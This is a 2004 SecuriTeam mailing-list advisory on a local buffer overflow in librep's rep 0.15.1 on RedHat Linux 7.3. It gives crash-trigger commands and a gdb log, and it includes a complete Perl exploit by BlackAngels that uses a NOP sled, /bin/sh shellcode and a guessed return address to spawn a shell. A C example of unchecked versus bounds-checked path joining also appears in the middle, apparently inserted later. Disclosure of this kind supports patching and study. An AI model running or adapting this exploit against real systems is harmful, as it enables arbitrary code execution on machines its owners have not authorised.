[UNIX] Local Buffer Overflow in REP (Long ARG)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/23/04

    To: list@securiteam.com
    Date: 23 Mar 2004 20:40:13 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Local Buffer Overflow in REP (Long ARG)
    ------------------------------------------------------------------------

    SUMMARY

    rep stands for "Read, Eval, Print", the three main components of any Lisp
    system. Librep is a dialect of Lisp, designed to be used both as an
    extension language for applications, and for use as a general programming
    language. A vulnerability in rep allows a local user to execute arbitrary
    code.

    DETAILS

    Vulnerable Systems:
     * RedHat Linux 7.3, kernel version 2.4.20; prior versions might also be
    affected
     * rep version 0.15.1

    To trigger the vulnerability, pass a string of 4081 bytes as the first
    argument:
    $ declare -x BADBUFFER=`perl -e '{print "A"x"4081"}'`
    $ rep $BADBUFFER
    Segmentation fault
    $ gdb rep
    (gdb) r $BADBUFFER
    Program received signal SIGSEGV, Segmentation fault.
    0x4003f3cd in Fexpand_file_name () from /usr/lib/librep.so.9
    (gdb) info reg esp
    esp 0xbf414139 0xbf414139
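    An added example in C, not librep's own code, of the defect class behind this crash and the bounds check that prevents it: an unchecked path join beside a checked one that refuses input too long for its buffer. The 4096-byte buffer, the 15-byte directory and the function names are assumptions; the 4081-byte argument is constructed here to match the trigger length above.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 4096   /* assumed buffer size; librep's real layout is not on the page */

/* Unsafe pattern (hypothetical, not librep's code): dir and name are joined into
 * a fixed buffer with no length check, so a long enough name writes past its end,
 * the failure the gdb session above shows inside Fexpand_file_name. Not called below. */
int join_path_unchecked(const char *dir, const char *name, char *out)
{
    strcpy(out, dir);
    strcat(out, "/");
    strcat(out, name);   /* overflows once strlen(dir)+1+strlen(name) >= buffer size */
    return 0;
}

/* Hardened form: same result, but the combined length is checked before any byte
 * is written. Returns 0 on success, -1 if "dir/name" plus NUL would not fit. */
int join_path_checked(const char *dir, const char *name, char *out, size_t out_len)
{
    size_t dlen = strlen(dir), nlen = strlen(name);
    if (dlen >= out_len)              /* no room for dir, let alone '/' and NUL */
        return -1;
    if (nlen >= out_len - dlen - 1)   /* need dlen + 1 + nlen + 1 <= out_len; no wraparound */
        return -1;
    memcpy(out, dir, dlen);
    out[dlen] = '/';
    memcpy(out + dlen + 1, name, nlen + 1);   /* includes the terminating NUL */
    return 0;
}

/* Feeds the checked version an argument of the advisory's trigger length (4081 bytes,
 * constructed here) under an assumed 15-byte directory; returns 1 if it was refused. */
int rejects_long_arg(void)
{
    static char arg[4081 + 1];
    char out[PATH_BUF];
    memset(arg, 'A', 4081);
    arg[4081] = '\0';
    return join_path_checked("/home/user/work", arg, out, sizeof out) == -1;
}

int main(void)
{
    char out[PATH_BUF];
    printf("short arg accepted: %d\n", join_path_checked("/tmp", "file.jl", out, sizeof out) == 0);
    printf("4081-byte arg refused: %d\n", rejects_long_arg());
    return 0;
}
```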

    Exploit Code:
    #!/usr/bin/perl -w

    # RedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit
    #
    # Legal notes :
    # The BlackAngels staff refuse all responsibilities for an incorrect
    # or illegal use of this code or for eventual damages to others systems.
    #
    # For more information:
    # [ http://www.blackangels.it ] - ( staff[at]blackangels.it )

    $len = 4260;          # total length of the argument handed to rep
    $ret = 0xbf414139;    # esp value observed in the gdb session above
    $nop = "\x90";

    print "\nRedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit";
    print "\nVulnerable versions: RedHat Linux 7.3 with 2.4.20";
    print "\n============================================================\n";

    if (!$ARGV[0]) {
        print "You must specify an offset [ Default = -1000 ] ...\n\n";
        exit(-1);
    }

    my $offset = "$ARGV[0]";

    $shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                 "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                 "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                 "\xff\xff/bin/sh";

    print "Trying to execute /bin/sh ...\n";

    # NOP sled, leaving room for the shellcode and 100 bytes of return addresses
    for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
        $buffer .= $nop;
    }

    $buffer .= $shellcode;

    print("\nAddress: 0x", sprintf('%lx',($ret + $offset)), "\n");
    print "\tRet: $ret + Offset: $offset\n\n";

    # Fill the remainder with the guessed return address (little-endian)
    $new_ret = pack('l', ($ret + $offset));
    for ($i += length($shellcode); $i < $len; $i += 4) {
        $buffer .= $new_ret;
    }

    exec("/usr/bin/rep $buffer");

    ADDITIONAL INFORMATION

    The information has been provided by BlackAngels Staff
    <mailto:staff@blackangels.it>.


